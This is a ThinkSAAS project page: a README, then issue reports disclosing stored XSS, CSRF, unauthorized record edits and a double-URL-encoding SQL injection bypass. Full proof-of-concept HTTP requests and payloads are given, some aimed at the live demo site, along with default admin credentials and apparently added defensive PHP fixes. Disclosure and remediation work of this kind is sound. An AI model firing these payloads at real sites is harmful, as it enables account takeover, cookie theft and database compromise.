
thinksaas's Introduction

ThinkSAAS

ThinkSAAS is a lightweight open source community system that can be used to build vertical community networks.
ThinkSAAS is a simple, highly extensible community development system.
ThinkSAAS helps you quickly develop and build a distinctive communication community.

Development environment

php >= 7.0
MySQL >= 5.6
MariaDB >= 5.6
Apache / Nginx
Windows / Linux
An LNMP or LAMP stack is recommended.

System Features

Development is simple; even PHP novices can build powerful functionality.
Single entry point.
Powerful extensibility: supports application extensions, plug-in extensions and HTTP API interface extensions.
Each module can be configured with its own independent database.
Multi-device adaptive, with Bootstrap integrated.
The core loads quickly and withstands high load and concurrency.
Supports installing third-party PHP libraries with Composer.
The system is stable, functionally modular, simple for secondary development, and continuously upgraded.
Suitable for individual and team collaborative development.

System basic functions

User center module (user)
System management module (system)
Group module (group)
Topic module (topic)
Article module (article)
Album module (photo)
Tag module (tag)
Mail module (mail)
Message module (message)
Chatter (micro-blog) module (weibo)
Search module (search)
My community (my)
Email registration and login
Mobile phone number registration
SMS verification code login
Alibaba Cloud Object Storage (OSS)
Human verification (CAPTCHA) when publishing content
Sensitive-word filtering
User behaviour logging
WeChat Official Account web authorization login
User points
More features and functions await your discovery!

Open source license

MIT License

Copyright (c) 2023 ThinkSAAS

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

Installation Notes

  1. Upload all files in the directory to the root directory of your website (on Linux systems, use FTP binary mode for the upload).
  2. Open your website address directly in the browser to install (do not add "install" to the address).
  3. Enter the database connection, website and administrator information as prompted by the installer (create an empty database for ThinkSAAS manually before installing).
  4. The installation is complete.

thinksaas's People

Contributors: dependabot[bot], thinksaas


thinksaas's Issues

Stored XSS in comments post

Stored XSS in comment posting

The comment section is vulnerable to XSS through JavaScript injected via an SVG, so malicious JS code may be executed in the victim's browser.

Ways to reproduce:
1. Comment on any post with malicious JS code injected, using a request like the following:

POST /index.php?app=group&ac=comment&ts=do&js=1 HTTP/1.1
Host: youdomain
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://yourdomain/thinknew/index.php?app=group&ac=topic&id=1
Content-Length: 104
Cookie: 
Connection: close

content=`<p>aaa<br><embed src=//html5sec.org/test.svg /></p>`&ispublic=0&topicid=1&token=99dc80d60a3284e86a8eef06c28a932f5614d29a

2. An alert box pops up, so the JS code has been executed.

ThinkSAAS 3.7.0 has a storage XSS vulnerability

Summary

There is a stored XSS vulnerability in ThinkSAAS 3.7.0. It occurs in the "Admin > Plug-in Management > Statistics Code plug-in": modifying the statistics code requires no CSRF validation, so an attacker can construct a form that makes an administrator submit an addition to the statistics code. plugins/edit/pubs/counter.php does not strictly filter the code, so every time an administrator visits index.php?app=pubs&ac=plugin&plugin=counter&in=edit&ts=set, the page edit_set.html, which references the variable {$code} directly, triggers the stored XSS.
If the statistics code plug-in is enabled, every user visiting the website triggers the stored XSS on every page, because according to the logic in plugins/pubs/counter/counter.php, {$code} is inserted into all pages.

Details

<?php
defined('IN_TS') or die('Access Denied.');

// Plug-in edit
switch($ts){
    case "set":
        // Render the edit form: $code is read back from disk (or the MySQL cache)
        // and handed to the template without any HTML escaping.
        $strAbout = fileRead('plugins/pubs/counter/about.php');

        $code = fileRead('data/plugins_pubs_counter.php');
        if($code==''){
            $code = $tsMySqlCache->get('plugins_pubs_counter');
        }
        $code = stripslashes($code);

        include template('edit_set','counter');
        break;

    case "do":
        // Save the submitted statistics code: no CSRF token check, and no
        // filtering of the value beyond tsTrim().
        $code = tsTrim($_POST['code']);

        fileWrite('plugins_pubs_counter.php','data',$code);
        $tsMySqlCache->set('plugins_pubs_counter',$code);

        header('Location: '.SITE_URL.'index.php?app=pubs&ac=plugin&plugin=counter&in=edit&ts=set');
        break;
}

As shown above, plugins/pubs/counter/edit.php does not filter the </textarea> tag out of the modified statistics code, so when edit_set.html later renders {$code}, the </textarea> closes the <textarea> tag, and the part of $code that should be inside the textarea ends up outside it.

Proof of Concept (POC)

POST /index.php?ac=plugin&app=pubs&in=edit&plugin=counter&ts=do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: PHPSESSID=7i6edin000gfa5r6s1aje15noc; ts_email=admin%40admin.com; ts_autologin=rufq90izjw0s8kko8gkgk8gkg0s80g8
Content-Length: 58
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: your-ip
Connection: Keep-alive

code=</textarea><ScRiPt%20>alert(document.cookie)</ScRiPt>


#FR# Article sub-categories

Currently, article categories have only one level.
How about supporting second-level categories?

PS. FR = Feature Request

Stored xss in study

  • Environment:
  • Program version: ThinkSAAS 2.93
  • App version: Course (study) | 1.0

1. Request this URL: example.com/index.php?app=study

2. Click '创建课程' (Create Lesson); you are redirected to example.com/index.php?app=study&ac=create

3. Write the XSS payload into '课程标题' (Lesson Title):

POST /index.php?app=study&ac=create&ts=do HTTP/1.1
Host: example.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------293582696224464
Content-Length: 668
Origin: http://example.com
Connection: close
Referer: http://example.com/index.php?app=study&ac=create
Cookie: Hm_lvt_1676addd34fc71983d401b8bd972b0c1=1567155131,1567416207; PHPSESSID=5nkq72udqv51008t7f7lsqekau; ts_email=1%401.com; ts_autologin=dgswuiwhehsko8088w40kwow8k0w8oo
Upgrade-Insecure-Requests: 1

-----------------------------293582696224464
Content-Disposition: form-data; name="studyname"

xss<script>alert(1)</script>
-----------------------------293582696224464
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


-----------------------------293582696224464
Content-Disposition: form-data; name="content"

<p>content<br></p>
-----------------------------293582696224464
Content-Disposition: form-data; name="price"

0
-----------------------------293582696224464
Content-Disposition: form-data; name="cateid"

1
-----------------------------293582696224464--

4. Then we are redirected to the page we just created, and the alert pops up.

5. The alert also pops up when the admin views the 'Lesson List' ( http://example.com/index.php?app=study&ac=admin&mg=study&ts=list )

Thinksns: unauthorized modification of album photo descriptions

Thinksns: unauthorized modification of album photo descriptions

POST Packet:
POST /index.php?app=photo&ac=album&ts=info_do HTTP/1.1
Host: demo.thinksaas.cn
Connection: close
Content-Length: 42
Cache-Control: max-age=0
Origin: https://demo.thinksaas.cn
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: https://demo.thinksaas.cn/index.php?app=photo&ac=album&ts=info&albumid=85&addtime=1552909150
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Your landing cookie

photoid%5B%5D=101&photodesc%5B%5D=test

Getting the parameters: log in to the demo on the official website, select an album: https://demo.thinksaas.cn/photo/, enter an album: https://demo.thinksaas.cn/photo/album/84/, then click an image: https://demo.thinksaas.cn/photo/show/103/. The photoid%5B%5D parameter is the number after "show" in that URL; replaying the packet changes the description of another user's picture to the value of the photodesc%5B%5D parameter.

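The report above shows the description of a photo being changed by whoever knows its id. As an added example (not ThinkSAAS code), the handler below scopes the update to photos owned by the session user, so a foreign photoid simply updates nothing. It assumes PDO with the SQLite driver; the ts_photo table, its columns and the rows are constructed here for the demo, and updatePhotoDescriptions()/photoDesc() are this example's own names.

```php
<?php
// Added example, not ThinkSAAS code: ownership-scoped update for the
// "album info" action. The owner id comes from the session, never from the
// form, and the WHERE clause includes it, so rows of other users are untouched.
declare(strict_types=1);

/**
 * Update descriptions photoIds[i] => descs[i] for the photos owned by $userId.
 * Returns the number of rows actually changed.
 */
function updatePhotoDescriptions(PDO $db, int $userId, array $photoIds, array $descs): int
{
    if (count($photoIds) !== count($descs)) {
        throw new InvalidArgumentException('photoid[] and photodesc[] must be parallel arrays');
    }
    $stmt = $db->prepare(
        'UPDATE ts_photo SET photodesc = :desc WHERE photoid = :id AND userid = :owner'
    );
    $changed = 0;
    $db->beginTransaction();
    foreach ($photoIds as $i => $rawId) {
        $id = filter_var($rawId, FILTER_VALIDATE_INT);
        if ($id === false) {
            continue;                                   // ignore non-numeric ids
        }
        $stmt->execute([':desc' => (string) $descs[$i], ':id' => $id, ':owner' => $userId]);
        $changed += $stmt->rowCount();                  // 0 when the photo is not ours
    }
    $db->commit();
    return $changed;
}

/** Read back one description (null when the photo does not exist). */
function photoDesc(PDO $db, int $photoid): ?string
{
    $s = $db->prepare('SELECT photodesc FROM ts_photo WHERE photoid = ?');
    $s->execute([$photoid]);
    $v = $s->fetchColumn();
    return $v === false ? null : (string) $v;
}

// --- constructed data: photo 101 belongs to user 7, photo 103 to user 9 ---
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE ts_photo (photoid INTEGER PRIMARY KEY, userid INTEGER NOT NULL, photodesc TEXT)');
$db->exec("INSERT INTO ts_photo VALUES (101, 7, 'mine'), (103, 9, 'theirs')");

// Simulated form photoid[]=101&photodesc[]=test, plus someone else's id 103.
$sessionUserId = 7;
$n = updatePhotoDescriptions($db, $sessionUserId, ['101', '103'], ['test', 'changed']);
assert($n === 1);                                       // only the caller's own photo changed
assert(photoDesc($db, 101) === 'test');
assert(photoDesc($db, 103) === 'theirs');               // other user's photo untouched
echo "ok\n";
```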

ThinkSAAS 3.7.0 has a storage XSS vulnerability

Summary

ThinkSAAS 3.7.0 has a stored XSS vulnerability. The request for Admin > Security Center > Sensitive Word Filtering has no CSRF verification. After an administrator clicks a malicious link, the CSRF not only disrupts normal business logic by adding or deleting arbitrary sensitive words, but also causes a stored XSS vulnerability.

Details

It appears in app/system/action/anti.php, such as the following parts:

case "worddo":
    // The word comes straight from the POST body; tsTrim() only trims it.
    $word = tsTrim($_POST['word']);
    if($word){
        $isWord = $new['system']->findCount('anti_word',array(
            'word'=>$word,
        ));
        if($isWord == 0){
            // Stored as-is; it is later rendered in the admin list unescaped.
            $new['system']->create('anti_word',array(
                'word'=>$word,
                'addtime'=>date('Y-m-d H:i:s'),
            ));

            // [...other code omitted...]

            qiMsg('敏感词添加成功!');   // "sensitive word added successfully"
        }
    }else{
        qiMsg('敏感词不能为空!');   // "sensitive word cannot be empty"
    }
    break;

In the above section of code, the contents of $_POST['word'] are used directly to create new sensitive words without any filtering or checking, making it easy to inject dangerous content.

Proof of Concept (POC)


POST /index.php?app=system&ac=anti&ts=worddo HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.289 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: ts_email=admin%40admin.com; ts_autologin=a21tr9l9wg00w8swgwckks4g0cskw8w; timezone=8; username_c1aa741a=admin; token_c1aa741a=5215abf192a064ccc90d9518304b966ee972689be2ca9d82e4bbd516b3301a6e1712987537; addinfo=%7B%22chkadmin%22%3A1%2C%22chkarticle%22%3A1%2C%22levelname%22%3A%22%5Cu7ba1%5Cu7406%5Cu5458%22%2C%22userid%22%3A%221%22%2C%22useralias%22%3A%22admin%22%7D; http304ok=1
Connection: close

word=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E

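Both the statistics-code plug-in report and this sensitive-word report come down to the same two defects: a value is echoed into an admin page without escaping for its HTML context, and the state-changing POST carries no anti-CSRF token. The following is an added example, not ThinkSAAS code and not the project's fix: renderCodeEditor(), renderWordList() and checkCsrfToken() are hypothetical names, ThinkSAAS's template()/qiMsg() helpers are not used, and PHP 7.4+ is assumed.

```php
<?php
// Added example, not ThinkSAAS code: context-aware output escaping for the two
// admin forms discussed above, plus a per-session CSRF token check.
declare(strict_types=1);

/** Escape untrusted text for an HTML text or double-quoted attribute context. */
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Render the stored statistics snippet inside a <textarea>. Unescaped, a stored
 * "</textarea><script>..." closes the textarea early and the rest is parsed as
 * markup; escaped, "<" becomes "&lt;" and the browser shows it as plain text.
 */
function renderCodeEditor(string $storedCode, string $csrfToken): string
{
    return '<form method="post" action="index.php?app=pubs&amp;ac=plugin&amp;plugin=counter&amp;in=edit&amp;ts=do">'
        . '<input type="hidden" name="token" value="' . e($csrfToken) . '">'
        . '<textarea name="code">' . e($storedCode) . '</textarea>'
        . '<button type="submit">Save</button></form>';
}

/** Render the sensitive-word list; each word is attacker-controllable text. */
function renderWordList(array $words): string
{
    $items = array_map(fn(string $w): string => '<li>' . e($w) . '</li>', $words);
    return '<ul>' . implode('', $items) . '</ul>';
}

/**
 * Gate every state-changing request on the session token. hash_equals() is a
 * constant-time comparison; a missing or wrong token means the POST may have
 * been forged from another site (CSRF), so the handler must not proceed.
 */
function checkCsrfToken(?string $submitted, string $sessionToken): bool
{
    return is_string($submitted) && $submitted !== '' && hash_equals($sessionToken, $submitted);
}

// --- demonstration with constructed values ---
$sessionToken = bin2hex(random_bytes(16));           // generated once per session
$hostile = '</textarea><ScRiPt >alert(document.cookie)</ScRiPt>';

$html = renderCodeEditor($hostile, $sessionToken);
assert(strpos($html, '<ScRiPt') === false);          // breakout neutralised
assert(substr_count($html, '</textarea>') === 1);     // only our own closing tag

$list = renderWordList(['badword', '<script>alert(document.cookie)</script>']);
assert(strpos($list, '<script>') === false);

assert(checkCsrfToken($sessionToken, $sessionToken) === true);
assert(checkCsrfToken('', $sessionToken) === false);
assert(checkCsrfToken(null, $sessionToken) === false);
echo "ok\n";
```

Escaping protects the editor page itself; the token check is what stops the forged submission that both reports describe, since the plug-in intentionally emits the admin-entered snippet raw on every page.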

Function error

Deprecated: Function get_magic_quotes_gpc() is deprecated in thinksaas/thinksaas.php on line 63

After disabling and re-enabling the slideshow plug-in, its position changes

After disabling the slideshow plug-in in the admin interface and enabling it again, its position on the home page differs from the position right after installation.
Right after installation, the slideshow plug-in is at the very top, below the text advertisement bar.
After re-enabling it, however, the slideshow plug-in is at the bottom, above the friendly links.

Request for PHP 7 support

As the title says.
The following deprecated functions are currently known to be used:

  • set_magic_quotes_runtime

Also: the description of the PHP version in each installation environment requirement should be changed to: PHP>=5.3, PHP<=7

Stored XSS (requires registration and login)

Stored XSS (requires registration and login)
When publishing an article:
POST /index.php?app=article&ac=comment&ts=do HTTP/1.1
Host: demo.thinksaas.cn
Connection: close
Content-Length: 178
Cache-Control: max-age=0
Origin: https://demo.thinksaas.cn
Upgrade-Insecure-Requests: 1
User-Agent:
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://demo.thinksaas.cn/article/show/395/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie:

content=%3Cp%3E11111111111%3C%2Fp%3E<iframe src=javascript:alert('success');height=0 width=0 /><iframe>&authcode=4211&articleid=395&token=602c37a28730ebb4371906d8be6bf3ab0a9a4421

Add the attack PoC <iframe src=javascript:alert('success');height=0 width=0 /><iframe> after %2Fp%3E in the content parameter.

Official reproduction: https://demo.thinksaas.cn/article/show/395/


Post-Auth SQL injection vulnerability in app/topic/action/admin/topic.php#2 (bypass of CVE-2020-35337)

0x01 Summary

In December last year there was a security problem caused by improper URL decoding (reference: #24).
In short, in ThinkSAAS-master\app\topic\action\admin\topic.php, improper filtering of the keyword parameter leads to SQL injection.
In last year's fix, $title was first renamed to the $kw variable,
and then filtered with the tsFilter function.
However, a security risk still remains.

# Responsible Vulnerability Disclosure info

Title:
  ThinkSAAS has a Post-Auth SQL injection vulnerability in app/topic/action/admin/topic.php

Desc:
  ThinkSAAS before 3.52 has SQL injection via the /index.php?app=topic&ac=admin&mg=topic&ts=list&title=PoC title parameter (requires admin privilege), allowing logged-in attackers to execute arbitrary SQL commands. This is a bypass of CVE-2020-35337.

Credit:
  Qianxin, Network Security Department, Product-Safety Team ( Unc1e )

Result:
  The vendor has confirmed this vuln and updated [ThinkSAAS 3.53] to fix this vuln.

Reference:
- https://github.com/thinksaas/ThinkSAAS/issues/28

0x02 Security vulnerability analysis

Global filtering analysis
In ThinkSAAS-master\thinksaas\thinksaas.php#62, tsgpc is used to filter input;
it uses addslashes to prevent SQL injection.

(1) Improper filtering logic in the tsFilter function

The tsFilter function is in ThinkSAAS-master\thinksaas\tsFunction.php.
This function replaces some dangerous keywords with an empty string, but it makes a mistake: the replacement is done only once, so an attacker can double-write a keyword such as

SELselect ECT

to end up with the real SELECT after a single pass.
Therefore, we recommend changing the single replacement (if) into a loop replacement (while).

(2) Improper filtering order

Note: the problem in (1) is not the most important one; even without (1), SQL injection is still possible.
In the logic of app/topic/action/admin/topic.php, the user input variable $_GET['kw'] is first filtered and then decoded with the urldecode function, which causes the SQL injection vulnerability.
In short, the problem is the difference between the value that is filtered and the value that is finally concatenated into the database query.
The procedure is as follows:

1. User-input param: %2550%256f%2543%2527%2520%2561%256e%2564%2520%2528%2573%2565%256c%2565%2563%2574%2520%2531%2520%2566%2572%256f%256d%2520%2528%2573%2565%256c%2565%2563%2574%2520%2573%256c%2565%2565%2570%2528%2531%2529%2529%2578%2529%2520%252d%252d%2520

2. The $kw param the server receives (already auto URL-decoded once): %50%6f%43%27%20%61%6e%64%20%28%73%65%6c%65%63%74%20%31%20%66%72%6f%6d%20%28%73%65%6c%65%63%74%20%73%6c%65%65%70%28%31%29%29%78%29%20%2d%2d%20
   - goes to thinksaas/thinksaas.php#62 via tsgpc()
   - tsgpc() actually applies addslashes() to escape [',"] (there is no [',"] yet, you know)
   - then line 13 tsFilter() filters blacklisted words (actually does nothing here)
   - the param is unchanged

3. $kw=urldecode(tsFilter($_GET['kw']));
   Notice the $kw param has now been URL-decoded again (twice, you know):
   PoC' and (select 1 from (select sleep(1))x) --

4. So the impact is a Post-Auth SQL injection (后台SQL注入):
   SELECT * FROM ts_topic WHERE `title` like '%PoC' and (select 1 from (select sleep(1))x) -- %' ORDER BY addtime desc

Or, if it is still unclear, you can add debugging code that prints the SQL statement at thinksaas\tsApp.php#165, as shown in the following figure:

GET /index.php?app=topic&ac=admin&mg=topic&ts=list&kw=%2550%256f%2543%2527%2520%2561%256e%2564%2520%2528%2573%2565%256c%2565%2563%2574%2520%2531%2520%2566%2572%256f%256d%2520%2528%2573%2565%256c%2565%2563%2574%2520%2573%256c%2565%2565%2570%2528%2531%2529%2529%2578%2529%2520%252d%252d%2520 HTTP/1.1
Host: thinksaas
Cache-Control: max-age=0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://thinksaas/index.php?install=result
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: PHPSESSID=t86vbus6e31om7uv1mrskb3ea5; Hm_lvt_5964cd4b8810fcc73c98618d475213f6=1627657957; Hm_lpvt_5964cd4b8810fcc73c98618d475213f6=1627657957
Connection: close

Causing a delay of 2 seconds

0x03 Vulnerability verification (PoC & exploit)

GET /index.php?app=topic&ac=admin&mg=topic&ts=list&title=PoC%%2527+and/**/1-(select/**/1/**/from/**/(select+sleep(3))a)%2523%2520 HTTP/1.1
Host: thinksaas
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4230.1 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-SG,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://thinksaas/index.php?app=search&ac=s&kw=keyword
Cookie: PHPSESSID=6im4ssqo33h8l2d43u78nbr4c3;  ts_autologin=goh59atl3dsk44o4sws48s80co44ww8
Upgrade-Insecure-Requests: 1

First, open the system management login page and enter the account and password to log in to the back end.

http://thinksaas/index.php?app=user&ac=system
- Default password is:
- admin@admin.com / 123456

Next, visit the URL

http://thinksaas//index.php?app=topic&ac=admin&mg=topic&ts=list&kw=%2550%256f%2543%2527%2520%2561%256e%2564%2520%2528%2573%2565%256c%2565%2563%2574%2520%2531%2520%2566%2572%256f%256d%2520%2528%2573%2565%256c%2565%2563%2574%2520%2573%256c%2565%2565%2570%2528%2531%2529%2529%2578%2529%2520%252d%252d%2520

A 2-second delay is observed on the web page, which is the proof of concept (PoC) for the vulnerability.
When exploiting this vulnerability, attackers can use logical operations to fully control the database, query information in the database, write data to webshell, and other dangerous operations.

0x04 Vulnerability fix

(1) Optimize the tsFilter function

The tsFilter function is in ThinkSAAS-master\thinksaas\tsFunction.php.
We recommend not using a blacklist to prevent SQL injection. However, if the fix keeps this approach, change the single replacement (if) in the function in tsFunction.php into a loop replacement (while).

(2) Fix the logic in topic.php

It is best to remove urldecode and filter directly.
If you [decode first, then filter], there is still a risk, because the URL decoding lets attackers bypass the global tsgpc() protection; to prevent SQL injection, the addslashes function must be applied correctly.
Change the logic in app/topic/action/admin/topic.php to:

$kw=tsFilter($_GET['kw']);  // recommended

0x05 Time Line

  • 2021.07.31 08:40, Qianxin, Network Security Department, Product-Safety Team ( Unc1e ) reported this issue to the developer of ThinkSAAS, via WeChat.
  • 2021.07.31 09:07, ThinkSAAS confirmed this vulnerability.
  • 2021.07.31 09:26, Qianxin, Network Security Department, Product-Safety Team ( Unc1e ) reviewed the mitigation of this vuln. (See 07ad849#diff-96592e102fa5e61c02150b963d7e30f03b7a5270be074b22091c1aca4bb321fb)
  • 2021.07.31 12:00, ThinkSAAS updated ThinkSAAS 3.53 to fix this vuln.
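The fix the report recommends keeps the keyword on a blacklist filter. As an added example (not ThinkSAAS code and not the project's own fix), the block below rewrites the admin topic search so the keyword is bound as a query parameter and is never URL-decoded a second time, which removes both problems the analysis describes. It assumes PDO with the SQLite driver; the ts_topic table with topicid, title and addtime columns and its rows are constructed in memory here, and searchTopics()/escapeLike()/keywordFromRequest() are this example's own names.

```php
<?php
// Added example, not ThinkSAAS code: parameterised LIKE search for the admin
// topic list. PHP already URL-decodes $_GET once; the extra urldecode() after
// filtering is what let the double-encoded quote reach the SQL text.
declare(strict_types=1);

/** Escape LIKE metacharacters so a user-supplied keyword matches literally. */
function escapeLike(string $kw, string $esc = '\\'): string
{
    return str_replace([$esc, '%', '_'], [$esc . $esc, $esc . '%', $esc . '_'], $kw);
}

/**
 * Search topics by title. The pattern is bound as a parameter, so quotes,
 * comment markers and nested SELECTs in it are just characters to match.
 */
function searchTopics(PDO $db, string $kw): array
{
    $stmt = $db->prepare(
        "SELECT topicid, title FROM ts_topic
          WHERE title LIKE :pattern ESCAPE '\\'
          ORDER BY addtime DESC"
    );
    $stmt->execute([':pattern' => '%' . escapeLike($kw) . '%']);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

/** Read the keyword the way topic.php should: trim only, no second decode. */
function keywordFromRequest(array $get): string
{
    $kw = isset($get['kw']) && is_string($get['kw']) ? $get['kw'] : '';
    return trim($kw);
}

// --- constructed data ---
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE ts_topic (topicid INTEGER PRIMARY KEY, title TEXT, addtime TEXT)');
$ins = $db->prepare('INSERT INTO ts_topic (title, addtime) VALUES (?, ?)');
$ins->execute(['PoC topic', '2021-07-31 08:40:00']);
$ins->execute(['100% done', '2021-07-31 09:00:00']);
$ins->execute(["O'Reilly books", '2021-07-31 09:30:00']);

// Ordinary searches, including one containing a quote, work.
assert(count(searchTopics($db, 'PoC')) === 1);
assert(searchTopics($db, "O'Reilly")[0]['title'] === "O'Reilly books");

// A LIKE wildcard in user input matches literally, not as a wildcard.
assert(count(searchTopics($db, '%')) === 1);

// The report's step-1 value, as PHP hands it over after its single decode
// (this equals the report's step-2 string): it stays percent-encoded text.
$raw = ['kw' => urldecode('%2550%256f%2543%2527%2520%2561%256e%2564%2520%2528%2573%2565%256c%2565%2563%2574%2520%2531%2520%2566%2572%256f%256d%2520%2528%2573%2565%256c%2565%2563%2574%2520%2573%256c%2565%2565%2570%2528%2531%2529%2529%2578%2529%2520%252d%252d%2520')];
$kw = keywordFromRequest($raw);
assert($kw === '%50%6f%43%27%20%61%6e%64%20%28%73%65%6c%65%63%74%20%31%20%66%72%6f%6d%20%28%73%65%6c%65%63%74%20%73%6c%65%65%70%28%31%29%29%78%29%20%2d%2d%20');
assert(searchTopics($db, $kw) === []);   // no title contains that literal text; no sleep()
echo "ok\n";
```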

Stored XSS 2 (requires registration and login)

When adding a group: https://demo.thinksaas.cn/group/create/

When modifying the group description:

POST /index.php?app=group&ac=create&ts=do HTTP/1.1
Host: demo.thinksaas.cn
Connection: close
Content-Length: 620
Cache-Control: max-age=0
Origin: https://demo.thinksaas.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWEZvXgMRfRnvrT3s
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: https://demo.thinksaas.cn/group/create/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=1agufb6os5sik9vb5onfcr0vs4; ts_email=admin%40mimaz.org; ts_autologin=c9qrjmbdwf4kw4ok4okoc0ggc84g8gc; Hm_lvt_5964cd4b8810fcc73c98618d475213f6=1533621094,1533625100,1533625361,1533625712; Hm_lpvt_5964cd4b8810fcc73c98618d475213f6=1533625993

------WebKitFormBoundaryWEZvXgMRfRnvrT3s
Content-Disposition: form-data; name="groupname"

name1
------WebKitFormBoundaryWEZvXgMRfRnvrT3s
Content-Disposition: form-data; name="groupdesc"

describe1<script src="1.js">
------WebKitFormBoundaryWEZvXgMRfRnvrT3s
Content-Disposition: form-data; name="photo"; filename=""
Content-Type: application/octet-stream

------WebKitFormBoundaryWEZvXgMRfRnvrT3s
Content-Disposition: form-data; name="tag"

Label1
------WebKitFormBoundaryWEZvXgMRfRnvrT3s
Content-Disposition: form-data; name="token"

ff94d70c0394174b299ac1c1efc5ccd539fc484e
------WebKitFormBoundaryWEZvXgMRfRnvrT3s--

Malicious code is not filtered in the groupdesc parameter, causing injection.

POC:<script src="1.js">

Official example: https://demo.thinksaas.cn/group/show/54/


Stored xss when administrator edits posts in the same group, or just click a url

Stored XSS when a group administrator edits posts in the group, or just clicks a URL

Ways to reproduce:

1. admin1 creates a new group with the following request; notice that the malicious code has been injected into the groupname param.

POST /index.php?app=group&ac=create&ts=do HTTP/1.1
Host: youdomain
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Content-Type: multipart/form-data; boundary=---------------------------159522762613371
Content-Length: 685
Cookie: 
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------159522762613371
Content-Disposition: form-data; name="groupname"

`<img src=1 onerror=alert(1)>`
-----------------------------159522762613371
Content-Disposition: form-data; name="groupdesc"

aaaaaaaaaaaaaaa
-----------------------------159522762613371
Content-Disposition: form-data; name="photo"; filename=""
Content-Type: application/octet-stream


-----------------------------159522762613371
Content-Disposition: form-data; name="tag"

aaaaaaaaaaaaaaa
-----------------------------159522762613371
Content-Disposition: form-data; name="token"

99dc80d60a3284e86a8eef06c28a932f5614d29a
